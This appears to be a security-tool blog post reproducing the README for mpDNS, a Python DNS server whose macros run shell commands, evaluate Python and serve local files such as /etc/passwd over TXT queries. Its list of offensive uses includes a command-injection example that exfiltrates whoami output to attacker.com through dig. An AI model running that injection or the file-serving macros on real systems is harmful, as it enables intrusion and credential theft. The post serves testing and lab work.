mpDNS : Multi-Purpose DNS Server 2019

mpDNS aka multi-purpose DNS server is a simple, configurable “clone & run” DNS server with multiple useful features.

  • Should work on Python 2 and 3
  • names.db -> holds all custom records (see examples)
  • Simple wildcards like *.example.com
  • Catch unicode dns requests
  • Custom actions aka macro:
    • {{shellexec::dig google.com +short}} -> Execute shell command and respond with result
    • {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code
    • {{file::/etc/passwd}} -> Respond with localfile contents
    • {{resolve}} -> Forward DNS request to local system DNS
    • {{resolve::example.com}} -> Resolve example.com instead of original record
    • {{echo}} -> Response back with peer address
    • {{shellexec::echo %PEER% %QUERY%}} -> Use of variables
  • Supported query types: A, CNAME, TXT
  • Update names.db records without restart/reload with ./mpdns.py -e

Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

Usage: ./mpdns.py

  • Edit names.db with ./mpdns.py -e no restart required

Offensive and Defensive purposes

  • You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
  • Test for various blind injection vulnerabilities in web applications (ex. /ping.php?ip=$(dig $(whoami).attacker.com))
  • Easily infiltrate 65K of data in one TXT query
  • DNS Rebinding
  • Execute custom macro action on specific query (useful in malware-analysis lab environments)
  • And lots more. It is highly customizable.

Installing

git clone https://github.com/nopernik/mpDNS

Limitations

  • Due to UDP Datagram limit of 65535 bytes, DNS response is limited to approx ~65200 bytes
    this limitation applies to TXT records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200b
    therefore TXT record with macro {{file:localfile.txt}} is limited to 65200 bytes.
  • No support for nested wildcards test.*.example.com
  • No support for custom DNS server resolver in {{resolve::example.com}} macro
  • TTL always set to 0

Also Read – Http Request Smuggler : Extension For Burp Suite

Examples

names.db example:

>>Empty configuration will result in empty but valid responses
>>Unicode domain names are not supported but still can be catched by the server.
>> For example мама-сервер-unicode.google.com will be catched but with SERVFAIL response

passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
notgoogle.com A {{resolve::google.com}}

Example output with names.db example:

Regular resolution from DB: dig test.example.com @localhost

;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8

mpDNS output: – Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)

Recursive CNAME resolution: dig c1.example.com @localhost

;; QUESTION SECTION:
;c1.example.com. IN A

;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14

mpDNS output:

>> Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)

Wildcard resolution: dig not-in-db.com @localhost

;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1

mpDNS output: – Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)

Wildcard subdomain resolution: dig wildcard.example.com @localhost

;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7

mpDNS output: – Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)

Forward request macro: dig google.com @localhost

;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110

mpDNS output: – Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)

Forward request of custom domain macro: dig notgoogle.com @localhost

;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110

mpDNS output: – Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)

File contents macro via TXT query: dig txt passwd.example.com @localhost

;; ANSWER SECTION:
passwd.example.com. 0 IN TXT “root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:……stripped”

mpDNS output: – Request from 127.0.0.1:38805 -> passwd.example.com. -> ‘root:x:0:0:root…(2808)’

Custom python code macro via TXT query: dig txt eval @localhost

;; ANSWER SECTION:
eval. 0 IN TXT “320”

mpDNS output: – Request from 127.0.0.1:33821 -> eval. -> ‘320’

Shell command macro via TXT query: dig txt shellexec @localhost

;; ANSWER SECTION:
shellexec. 0 IN TXT “root”

mpDNS output: – Request from 127.0.0.1:50262 -> shellexec. -> ‘root’

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

3 days ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

3 days ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

5 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

1 week ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago